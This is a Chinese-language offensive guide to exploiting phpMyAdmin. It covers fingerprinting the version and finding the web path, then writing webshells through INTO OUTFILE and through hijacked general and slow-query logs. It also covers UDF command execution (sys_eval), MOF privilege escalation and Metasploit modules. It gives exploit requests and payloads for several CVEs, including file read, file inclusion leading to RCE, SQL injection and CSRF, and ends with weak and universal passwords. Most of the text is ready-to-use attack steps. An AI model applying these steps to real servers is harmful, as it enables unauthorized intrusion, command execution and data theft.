phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
0x01 信息收集
1.1 版本信息获取
获取phpmyadmin版本信息,在网址根路径后面添加
1 | readme.php |
(注意区分大小写)就可以看到phpmyadmin的相关版本信息了,这个方法也是通杀的,只要管理员不把他们删掉。
也可以直接访问:/doc/html/index.html目录
1.2 绝对路径获取
(1) phpinfo() 页面:最理想的情况,直接显示web路径
(2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径
(3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以通过查看数据库路径
1 | show variables like '%datadir%'; |
再猜解web路径的方法,一般容易成功。
(4) 利用select load_file() 读取文件找到web路径:可以尝试/etc/passwd,apache|nginx|httpd log之类的文件。
Trick:如何判断目录是否存在,往往确定了/var/www/html目录,但是还有一层目录不能 确定,可以采用目标域名+常用的网站根目录的方式进行爆破,当使用
1 | select 'test' into outfile '/var/www/$fuzz$/shell.php'; |
时目录$fuzz$不存在将会报错Can’t create/write to file ‘/var/www/html/666.txt’ (Errcode: 2);如果存在但是目录写不进去将返回(Errcode: 13);如果使用的
1 | load data infile "/etc/passwd" into table test; |
该语句执行后将也会显示文件是否存在,有权限能否写等信息。
(5)其他方法
1 | 1.查看数据库表内容获取 有一些cms会保存网站配置文件 或者路径 |
0x02 PhpMyAdmin利用
2.1 写入文件GetShell
可以通过写shell进行提权,而我们需要满足以下条件:
1 | 1.数据库root权限 |
MySQL 5.0+的版本会,然后在服务运行的情况下修改变量变量也可以移动文件位置的,但是必须要对生成日志的目录具有可更改的写权限。(Linux环境下可能会比较苛刻,因为站点目录是一个用户,MySQL是另外一个用户,权限管控较大严格,主要取决于权限配置是否得当)
2.1.1 直接写入文件getshell
直接用into outfile 直接在网站目录下写入webshell,但是该方法需要前提条件是:
(1) 当前的数据库用户有写权限
(2) 知道web绝对路径
(3) web路径能写
如何判断当前数据库用户有写权限?
执行:
1 | show variables like '%secure%'; |
如果secure_file_priv如果非空,则只能在对应的目录下读文件,如果是空即可在其他目录写。Linux下默认/tmp目录可写。
1 | secure-file-priv特性 |
编写一句phpinfo文件,
1 | select "<?php phpinfo();?>" INTO OUTFILE "d:\\phpstudy\\www\\7.php" |
这里必须注意要双反斜线,否则会转义,
2.1.2 通过写入日志文件getshell
读写权限+web绝对路径,修改日志文件为webshell
具体利用方法如下
(1) 开启日志记录:
1 | set global general_log = "ON"; |
(2) 查看当前的日志目录:
1 | show variables like 'general%'; |
(3) 指定日志文件
1 | set global general_log_file = "C:/phpStudy/PHPTutorial/WWW/404.php"; |
(4)) 写入执行代码:
1 | select "<?php phpinfo();?>"; |
2.1.3 通过慢查询写入webshell
具体方法如下:
(1) 查看当前慢查询日志目录:
1 | show variables like '%slow%'; |
(2) 重新设置路径:
1 | set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php'; |
(3) 开启慢查询日志:
1 | set GLOBAL slow_query_log=on; |
(4)) 执行写入日志:
1 | select '<?php phpinfo();?>' from mysql.db where sleep(10); |
2.2 User defined funct ion(UDF):
适用于Windows和Linux环境,利用需要的条件:具有写权限+插件目录可写(或者可以更改指定的插件目录)。具体情况要看目标mysql的版本:
(1) Mysql version > 5.1 时,dll或者so必须位于mysql安装目录lib\plugin下,当对该目录具有写权限时可以利用,查看:
1 | show variables like %plugin%;// 查看插件目录 |
(2) 5.0 <= Mysql version <5.1时,需要导出至目标服务器的系统目录,如C://Windows/System32
(3) Mysql version < 5.0 时,目录可以自定义具体利用如下:
a 根据目标mysql版本写入特定目录的so或者dll,可以参考sqlmap里面的
1 | select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\l ib\plugin\lib_mysqludf_sys.dll'; |
b 创建对应的function:
1 | create function sys_eval returns string soname "lib_mysqludf_sys.dll"; |
c 执行命令:
1 | select * from mysql.func where name = 'sys_eval'; #查看创建的sys_eval函数select sys_eval('whoami'); #使用系统命令 |
2.3 MOF提权:
通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次上传的MOF。一般适用于Windows <= 2003,并且C:\Windows\System32\mof目录具有写权限(一般是没有权限写)。可以使用MSF直接利用:
1 | use exploit/windows/mysql/mysql_mof |
0x03 PhpMyAdmin漏洞利用
3.1 WooYun-2016-199433:任意文件读取漏洞
影响范围:
1 | phpMyAdmin version |
POC如下:
1 | POST /scripts/setup.php HTTP/1.1 |
3.2 CVE-2014 -8959:本地文件包含
影响范围:
1 | phpMyAdmin version |
POC如下:
1 | /gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00 # 注意改下token值 |
在实际利用中可以利用写入文件到/tmp目录下结合此漏洞完成RCE,php版本可以通过http header、导出表内容到文件的附加内容看到。
3.3 CVE-2016-5734 :后台命令执行RCE
影响范围:
1 | phpMyAdmin version |
POC如下:
1 | #!/usr/bin/env python |
利用如下:
1 | cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');" |
3.4 CVE-2018-12613:后台文件包含
影响范围:
1 | phpMyAdmin version |
利用如下:
(1)执行SQL语句,将PHP代码写入Session文件中:
1 | select '<?php phpinfo();exit;?>' |
(2)包含session文件:
1 | http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/l ib/php/sessions/sess_*** # *** 为phpMyAdmin的COOKIE值 |
3.5 CVE-2018-19968:任意文件包含/RCE
影响范围:
1 | phpMyAdmin version |
利用如下:
(1)创建数据库,并将PHP代码写入Session文件中
1 | CREATE DATABASE foo;CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; |
(2)生成foo数据库的phpMyAdmin的配置表,访问:
1 | http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo |
(3)篡改数据插入pma column_info中:
1 | INSERT INTO` pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_***','plop'; # *** 为phpMyAdmin 的COOKIE值 |
这里要注意不用系统的session保存位置不同,具体系统可以在phpMyAdmin登录后首页看到
MacOS:
1 | /var/tmp |
Linux:
1 | /var/lib/php/sessions |
phpStudy:
1 | /phpstudy/PHPTutorial/tmp/tmp |
(4)访问包含Session文件的地址:
1 | http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[ multi_edit][][]=baz&clause_is_unique=1 |
3.6 CVE-2020-0554:后台SQL注入
影响范围:
1 | phpMyAdmin version |
简单总结流程:
页面位置server_privileges.php;
设置变量ajax_requests为true;
设置变量validate_username 为真值;
设置变量username 为我们拼接的注入语句。
构造payload:
1 | http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server |
(token和其余参数会在访问页面的时候自动提供)
我们查看后端收到的数据,可以看到SQL已经成功拼接。
执行完毕后程序只会告知SQL是否执行成功,失败会报错,因此此处我们可以利用报错注入。
构造payload:
1 | http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server |
结果如下,可以看到已经成功执行了我们注入的指令。
CVE-2020-0554:phpMyAdmin后台SQL注入
3.7 CVE-2019-12922 跨站请求伪造
影响范围:
1 | phpMyAdmin version |
利用如下:
在登录状态下,添加一个服务器
1 | http://192.168.123.65/phpmyadmin/setup/index.php |
点击删除时,通过工具抓包
参数id对应的是第几个服务器。构造恶意链接。
当然实战中的链接怎么吸引人让目标去点击还得靠自己去构造。
页面显示404,但img的src会去请求一次。此时创建了两个服务器
点击我们构造的恶意链接时,显示刚才构造的页面结果
此时再去查看服务器
已经被删除,攻击成功。
CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站请求伪造漏洞复现
3.8 CVE-2017-1000499 跨站请求伪造
影响范围:
1 | phpMyAdmin version |
POC如下:
1 | # Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery |
0x04 特殊版本GetShell
4.1 CVE-2013-3238
影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace
4.2 CVE-2012-5159
影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor
4.3 CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模块:exploit/unix/webapp/phpmyadmin_config
4.4 弱口令&万能密码
弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,用户名‘localhost’@‘@”则登录成功